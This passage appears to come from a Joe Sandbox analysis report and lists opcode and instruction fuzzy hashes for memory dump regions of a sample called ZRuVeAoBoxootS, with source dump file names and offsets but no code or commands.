                        • Opcode Fuzzy Hash: 7a77022b7586a38db22cf4ca3d859c85c91676b13e13adde41be7f756de9daa0
                        • Instruction Fuzzy Hash: 11510935A01209EFEB10DF95D594B9EBBB2FF88311F208069E905AB355CB31AD12CF60
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aae94d99f3d5d7ebdd5b86df9a1a467e9e000d991c798dbdcc1d21a687707560
                        • Instruction ID: c20886964c33202cbed447113cb48713a0f4fddf37ae5a863a7139d1ab07469f
                        • Opcode Fuzzy Hash: aae94d99f3d5d7ebdd5b86df9a1a467e9e000d991c798dbdcc1d21a687707560
                        • Instruction Fuzzy Hash: E0417C34A00248DFDB15DF68D594ADDBBF2EF89718F1094A9D10AAB3A1CB72AC05CF51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f38b253ef62821dd09573614cc9bc820fc4793b449428ac263ae18ea63178113
                        • Instruction ID: d4c40606b26458a3b409c9ca332de18c6d73fa48c8a6e08d9280819187f64c80
                        • Opcode Fuzzy Hash: f38b253ef62821dd09573614cc9bc820fc4793b449428ac263ae18ea63178113
                        • Instruction Fuzzy Hash: 7C41F935A002189FDB54EBA8C894BDDB7B1BF89715F114068E905EB3A1D739A842CF60
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 146c0a83cfff253daf2bf192ae73752a207eacf813e36d96df2cef9a3308452e
                        • Instruction ID: d563b305ddc56c691511f4a5eb216527f5f8c66e62e62f3717b37fa44a1b9a40
                        • Opcode Fuzzy Hash: 146c0a83cfff253daf2bf192ae73752a207eacf813e36d96df2cef9a3308452e
                        • Instruction Fuzzy Hash: 88415934A00208DFDB15EF68D594ADDB7F2EF88718F1084A8D50AAB390CB72AD45CF91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9b1148b8acf4f09f8e8fc6dd9fc41fedd18ae1d804ceb8758ef55315b78ad55
                        • Instruction ID: 404348512a6f1415d6f94e5399bf9cc06867b76da7eaeb099c2544a55ce8f9d7
                        • Opcode Fuzzy Hash: b9b1148b8acf4f09f8e8fc6dd9fc41fedd18ae1d804ceb8758ef55315b78ad55
                        • Instruction Fuzzy Hash: F9414D71B002199FDF15DBA8D880AEEB7F6AF89305F104529E106E7390DBB4AD42CB85
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a0f0b104a9eec26f3712c25c5ba3f3eac3edcb20fda719d6f504b3d6527b199
                        • Instruction ID: 28a0476a607ab39e362b4309b5da867c4a0f21416f6d0567b47de69c6848a723
                        • Opcode Fuzzy Hash: 2a0f0b104a9eec26f3712c25c5ba3f3eac3edcb20fda719d6f504b3d6527b199
                        • Instruction Fuzzy Hash: 1F415F34A00709DFCB04EF78C884ADDBBB2FF89305F008559E5156B365EB71A946CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b91f0ead82eced57ff441e666122a603c285b9491cbe474c299f9a367d23f1f
                        • Instruction ID: b42da7a585a1a5bfb442468820cfe3dcf9e686f27800ea9c742dd619cb567d6f
                        • Opcode Fuzzy Hash: 1b91f0ead82eced57ff441e666122a603c285b9491cbe474c299f9a367d23f1f
                        • Instruction Fuzzy Hash: 3E414C34A10709DFDB04EF68C894A9DB7B2FF89305F008559E515AB325EB71B946CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f66172d8803e5b275da80a3351fc56b8ee0ace93fc36ae9ea9debab068d3333
                        • Instruction ID: 7c6099fbc35bfc41dffe01490e6d00ac5eed62d44ebf47f823eeb1942f72bd8d
                        • Opcode Fuzzy Hash: 4f66172d8803e5b275da80a3351fc56b8ee0ace93fc36ae9ea9debab068d3333
                        • Instruction Fuzzy Hash: 39317C31F083058FDB11ABB9E84469A7BF6EFC5320F158569E148AB241DF30AC49C7D6
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65fbc4d1a38ef7381bd5eef0e0e7332e53b5edb04c2f6eb4e53dbf225555b31c
                        • Instruction ID: b72ff7db785c1027330d85df2a9bdda7319a40735b906199fb306e90e5273431
                        • Opcode Fuzzy Hash: 65fbc4d1a38ef7381bd5eef0e0e7332e53b5edb04c2f6eb4e53dbf225555b31c
                        • Instruction Fuzzy Hash: 5241E3B1D00349DBDB24CFA9C584ADDFBB5BF49304F648129D408BB250D7B5AA46CF90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfd54e20a9fb24ef8792b224dc9f974efe75ac5f5eef8814e617003b354e14b0
                        • Instruction ID: a96523432339a42495418b4bc8e89efa72aa186c761ea572a4267a252607a72b
                        • Opcode Fuzzy Hash: dfd54e20a9fb24ef8792b224dc9f974efe75ac5f5eef8814e617003b354e14b0
                        • Instruction Fuzzy Hash: B341C2B1D00349DBDB24CFA9C584ACDFBB5BF49304F64852AD408BB254D7B56A8ACF90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af6cc40f1f59ea02d2d3b8cc03a3a557912ad3bbee2a846888009cddd3557802
                        • Instruction ID: 22db0e8cbc7d400c00a35292ee6617810ec0f72856b4cd23678ccdc324ecb2dc
                        • Opcode Fuzzy Hash: af6cc40f1f59ea02d2d3b8cc03a3a557912ad3bbee2a846888009cddd3557802
                        • Instruction Fuzzy Hash: 28410875A0020ADFCB44DF69D88499EFBB5FF89310B14C259E958AB315E730A986CF90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d509314cad420aa5e2906d4d89b1495dafc17857aab79c2afba52eea27317edd
                        • Instruction ID: 30cffdb3b4eeeb280ecbabc9e808b1df295f7920e283c80f048aa0a70dd3ff38
                        • Opcode Fuzzy Hash: d509314cad420aa5e2906d4d89b1495dafc17857aab79c2afba52eea27317edd
                        • Instruction Fuzzy Hash: 1641A0B1D103589FDB14CFAAC984ADEFBB1BF48714F24822AE418BB250D7B46845CF91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7301c135dd775e192b00ece8a15b20a7842ff1b702dce2b0b760a20682aab86
                        • Instruction ID: b52e46fc2ac060dbe17261149306ea5ab15756e519196ba7661202e1a266aab6
                        • Opcode Fuzzy Hash: c7301c135dd775e192b00ece8a15b20a7842ff1b702dce2b0b760a20682aab86
                        • Instruction Fuzzy Hash: 70319275A01300CBEB00EF7AD894B5577A2FFC9325F088679D84D6B249EBB8A845CB51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba27aac16fd492aacdcc14e36c014d4b9c5512d541403fb9f45155f373d10a7b
                        • Instruction ID: aabc572232778e9b22e7644b8cc57124d8629a397296956423ee07f5f187be67
                        • Opcode Fuzzy Hash: ba27aac16fd492aacdcc14e36c014d4b9c5512d541403fb9f45155f373d10a7b
                        • Instruction Fuzzy Hash: 0741F775A0020ADFCB40DF69D88499EFBB5FF89310B14C659E918AB315E730E986CF90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70d0c9c4087ed8b1a4a56c63dd67e4b7c53d6eb6b7e1226d04bfaadb614274e3
                        • Instruction ID: 47673ea35f8b58925c886073bdaa5c41d051c87cf959cd94d9a91985bc2ec69e
                        • Opcode Fuzzy Hash: 70d0c9c4087ed8b1a4a56c63dd67e4b7c53d6eb6b7e1226d04bfaadb614274e3
                        • Instruction Fuzzy Hash: 5A318F36A002159FCF04EF64E8548DDF7B6FF89215B048169F506AB325EB75BD46CB80
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbd17f51d954ba9eee0c8d5ff1bd1bbdc0c38dc4e4a463525ff3081f2e1d307a
                        • Instruction ID: 1b050f8ef1886c5e4b477fa27017aa9ae6fe543908f0b81feab865d912561885
                        • Opcode Fuzzy Hash: cbd17f51d954ba9eee0c8d5ff1bd1bbdc0c38dc4e4a463525ff3081f2e1d307a
                        • Instruction Fuzzy Hash: F731C175A01300CBEB10EF7AD884B5577A1FF89315F098679D8096B349EB78A845CB51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b4bfaa56aa897729c5d8769caa6df43f272704aa28e601db4e64903b024b8a8
                        • Instruction ID: c02b3c10d370c8d98d85587e43d4dfe37a7b539b30b95746a06411dafc281a66
                        • Opcode Fuzzy Hash: 9b4bfaa56aa897729c5d8769caa6df43f272704aa28e601db4e64903b024b8a8
                        • Instruction Fuzzy Hash: E721A8327102018FD714DB6CC89566937D6EF85726F1981B5E109DF3A3DA75FC058B90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8313816ef4ed5bccfee75552225117ed171d175d4077ebbb7eb48e34cef1feec
                        • Instruction ID: 9f055c0cfcce28540e68ea5a3fbf138fea821144576595d504f4ec2d026ecd68
                        • Opcode Fuzzy Hash: 8313816ef4ed5bccfee75552225117ed171d175d4077ebbb7eb48e34cef1feec
                        • Instruction Fuzzy Hash: B4219171F002455FEB41EBA9CD409FFBBFAEFC4255B04812AE455E3250EB709A038B90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0c37e4a96420261d3bc2c718c1d12cce00fdcff1644d49efbbee9e65d5a29a
                        • Instruction ID: ca56f67365d41b0402d4d71fe12f2a43f9278f4927778f75b575f9a2f77a7a4f
                        • Opcode Fuzzy Hash: 0f0c37e4a96420261d3bc2c718c1d12cce00fdcff1644d49efbbee9e65d5a29a
                        • Instruction Fuzzy Hash: C1312579B111148FDB44EF69D884AAC7BF6BF89706F1480A9E505EB3A1DB31ED02CB11
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 936f179c4f8b8530bf9e6a657ab6fd8d6cb71dd77531ecf9cce761bd4d5c9eef
                        • Instruction ID: f12b1f8e8639e03e59ee591988f392577241b7b52847a87b005b0c125c5b05fe
                        • Opcode Fuzzy Hash: 936f179c4f8b8530bf9e6a657ab6fd8d6cb71dd77531ecf9cce761bd4d5c9eef
                        • Instruction Fuzzy Hash: F331C271F042049FCF14DBB9D840AAEB7F5AF89301F00442AE406E73A0EBB4AD02CB40
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6ff9017131ff275087781c34a777ec8ec215ba800e9a2b5f4cbb0258148849d
                        • Instruction ID: b40ea2086f7295e3804634b3ebcc0863c866a2807eb53d779153a40c687beb1d
                        • Opcode Fuzzy Hash: e6ff9017131ff275087781c34a777ec8ec215ba800e9a2b5f4cbb0258148849d
                        • Instruction Fuzzy Hash: 3321D331A002448FD711EF78D4588DBBBE6EF85614B15C8AAD106EB351EF75E80A8F91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73fca0b813e75bfa53423d9d75d93051c883b46ac29cb2e3e4db525a212293b0
                        • Instruction ID: f79d68ca0335048e1db66ef830d45f1bbdb3bddf64ee186505ca2fbff1206a6c
                        • Opcode Fuzzy Hash: 73fca0b813e75bfa53423d9d75d93051c883b46ac29cb2e3e4db525a212293b0
                        • Instruction Fuzzy Hash: 782105783505008FD758EF2DD898D2977E6EF8AB1572640A9E606CB3B1DA31EC028B50
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 944a866c6dfaec751736a9d0c9f5bd2a358137119246c2955396f2af2b1762cc
                        • Instruction ID: ede691ff1698a06baf132fd71566813c98cdaba09546dfee99db4e50f80e6d49
                        • Opcode Fuzzy Hash: 944a866c6dfaec751736a9d0c9f5bd2a358137119246c2955396f2af2b1762cc
                        • Instruction Fuzzy Hash: 05312232D14B0ADECB01EF78C854499F7B1FF95310B118A5AE5596B121FB30E695CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3252c96846be410134378a15b6e596624b5724396ee7bf05158bad31a4830b1f
                        • Instruction ID: 1c66472264baf358649c661ae740947f0076fb8f68f1ee82c29893c55cfba59e
                        • Opcode Fuzzy Hash: 3252c96846be410134378a15b6e596624b5724396ee7bf05158bad31a4830b1f
                        • Instruction Fuzzy Hash: 0E01BD32F182119FFB18567968586BF37DADBC965531605AAF005D3340EE24EC0383D0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20a79cd71d1c7c6fac89620964073d232ec52b61be4a495938356c97cca5fff5
                        • Instruction ID: cb135c3175abd931914b7489db945c810ea6f96c69f3273c5f022e5edc01881c
                        • Opcode Fuzzy Hash: 20a79cd71d1c7c6fac89620964073d232ec52b61be4a495938356c97cca5fff5
                        • Instruction Fuzzy Hash: 2121A731B10B059FD734DF39D486A26B7F1FB45612F140E29E8AACB640D770F88A8B91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675054945.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_270d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 704af04290792cb407a738c251c5b55709b00726d4c3800dd98826449537a7b5
                        • Instruction ID: 644ab4805e356bcbb18eb7c29f15a67c3dd86bb3ca9fea4ae11cc22aff48a1c2
                        • Opcode Fuzzy Hash: 704af04290792cb407a738c251c5b55709b00726d4c3800dd98826449537a7b5
                        • Instruction Fuzzy Hash: 4121F871504344DFDB25DF54D9C0B2ABFA5FB88318F24C569EC051B296C336D45ACAA2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e42c1b28ca6e5dbf87ecc111cfef237941211c3f6d974f254d5b43a84e0f201
                        • Instruction ID: f592532f66215f93b262450d2ff433ddc1f3243e7bccccf871d07bbf163109cf
                        • Opcode Fuzzy Hash: 4e42c1b28ca6e5dbf87ecc111cfef237941211c3f6d974f254d5b43a84e0f201
                        • Instruction Fuzzy Hash: F731FE32D10B0ADACB01EFB9C854499F7B1FF95310B118B5AE9596B221FB30E695CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b99273d380457a6122b4be15da0474580e33a8ed79a0e7a327da0c01abce5232
                        • Instruction ID: 0365601d5743aa540f4bf014129144b4b08bc153c4bbb8cb5637bb786aeac1a1
                        • Opcode Fuzzy Hash: b99273d380457a6122b4be15da0474580e33a8ed79a0e7a327da0c01abce5232
                        • Instruction Fuzzy Hash: 3D214C743012108FDB18EB39C454E6977E6EF86726B1484AED506CB371DBB6EC02CB51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a9b8754c95639a201f993355cdade2118f52e6707e5b8a1ea14dec699420264
                        • Instruction ID: f5be9b8cd57db2ab114d917d88da5c63ea27fe5ac633191e0ed48b9d445868c9
                        • Opcode Fuzzy Hash: 6a9b8754c95639a201f993355cdade2118f52e6707e5b8a1ea14dec699420264
                        • Instruction Fuzzy Hash: 9F210471504304EFEB29DF58D9C0B26BBA5FF88324F20C6ADE8595B252C336D446CE61
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6d1a9d4d219e6d76e5f03cfb7a766e225b705c28e50216445c5c49c563a67e0
                        • Instruction ID: 5c4df53bdef32d8a21308a1a1575d1b4b0073a28329eee02cdbf22d6fb320098
                        • Opcode Fuzzy Hash: b6d1a9d4d219e6d76e5f03cfb7a766e225b705c28e50216445c5c49c563a67e0
                        • Instruction Fuzzy Hash: 8521D075604204EFDB24DF28D984B26BBA5EF88214F20C5ADE84A4B246C33AD447CE62
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6498e493ab70982ae99f69d1b1561a53fef417324f2b4041c9ff087b45ff7d0
                        • Instruction ID: e5d1be0a57b47485968401bef041791229f7edf0e6a4429cb9a89745a46a2a44
                        • Opcode Fuzzy Hash: b6498e493ab70982ae99f69d1b1561a53fef417324f2b4041c9ff087b45ff7d0
                        • Instruction Fuzzy Hash: 4B2129747112108FD758EB39C494E6A73E6EF85725B1084AED506CB3A0DBB6EC02CB51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b355ec1a8a7371676cfb8edcb6594d3e20bad58b8795f4f70a8a7805d27feab
                        • Instruction ID: bfe9ba92536603b2340242cc996a834958d46f0df8f481f7af16846f75e635e4
                        • Opcode Fuzzy Hash: 1b355ec1a8a7371676cfb8edcb6594d3e20bad58b8795f4f70a8a7805d27feab
                        • Instruction Fuzzy Hash: 7821B031A10709DFDB00EF69C8848ADB3B1FF8931474186A9E549AB321EB30E944CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77c5845aa27a07aa1071b00e32f85a2ef66b2ff76869449b361602265daa5e90
                        • Instruction ID: 915425d4fd649052bd356757d93a5432ca3cf2a9230afb5dc1744f14840796e8
                        • Opcode Fuzzy Hash: 77c5845aa27a07aa1071b00e32f85a2ef66b2ff76869449b361602265daa5e90
                        • Instruction Fuzzy Hash: FF31F574E01208AFEB20CF55D594B9EBBF2FF88311F258069E945AB750CB31AD51CB64
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b111a180353f8e7003dfee82847cd49cb65d99a754154fce32341bb8ce1a6290
                        • Instruction ID: 2c43c069d84ee4e52a8bb0978dde3b5dfd27b221d4fd65936d7f75f44c9fb865
                        • Opcode Fuzzy Hash: b111a180353f8e7003dfee82847cd49cb65d99a754154fce32341bb8ce1a6290
                        • Instruction Fuzzy Hash: 5D21C231A01705EBEB25EF69C88055AB7A1EF88325B10C96DD909AB345DB31FC86CB80
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e23d91bed6286c24411fede286598fe2fdeb9425734ce42bf77e53a0f342ae0e
                        • Instruction ID: 32c006556fafda418ab8fa3dd38e6b9d9d5a14f1b9e556da9afa3e50805725db
                        • Opcode Fuzzy Hash: e23d91bed6286c24411fede286598fe2fdeb9425734ce42bf77e53a0f342ae0e
                        • Instruction Fuzzy Hash: D611B431F00A158BDB25FEA9C8412BEB7F6EFC4751F04862AE505A7300DB78B90287D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2aabe047816926f4cc77703cc3cb87df976c8fc2f8d1a3f24a04e07bf773a945
                        • Instruction ID: 2e3e6026d6eeea9dbd3d36d449470b9fbff4b674088ec01f28f85ca766e1eefe
                        • Opcode Fuzzy Hash: 2aabe047816926f4cc77703cc3cb87df976c8fc2f8d1a3f24a04e07bf773a945
                        • Instruction Fuzzy Hash: 1311E471A002088FD711DF68C5548EBBBF6EF84715B1088A9D106EB390EF30ED0A8F91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ce58c9e1d7b7fd5ea80efe18f7dbb2b90a1c7f13aa3eef40d755a741d1e9247
                        • Instruction ID: 163fef95f9fe3f772394868fbe8e0940de6c3505c5bb983f325ddc1bcace1fae
                        • Opcode Fuzzy Hash: 6ce58c9e1d7b7fd5ea80efe18f7dbb2b90a1c7f13aa3eef40d755a741d1e9247
                        • Instruction Fuzzy Hash: CB21F670D012499FEB05EBB4E8905EE7BF2EF85310F004569C1056F191EF316A0ACFA2
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6788f0dadaf38c2f1d42f868ffc64a0817c4218289c297ba3c9b11e848552f78
                        • Instruction ID: 54611b81b1628e9fedc13c2d1d4c251a0c73d83a6887b1f1a44188f1a90dd0fc
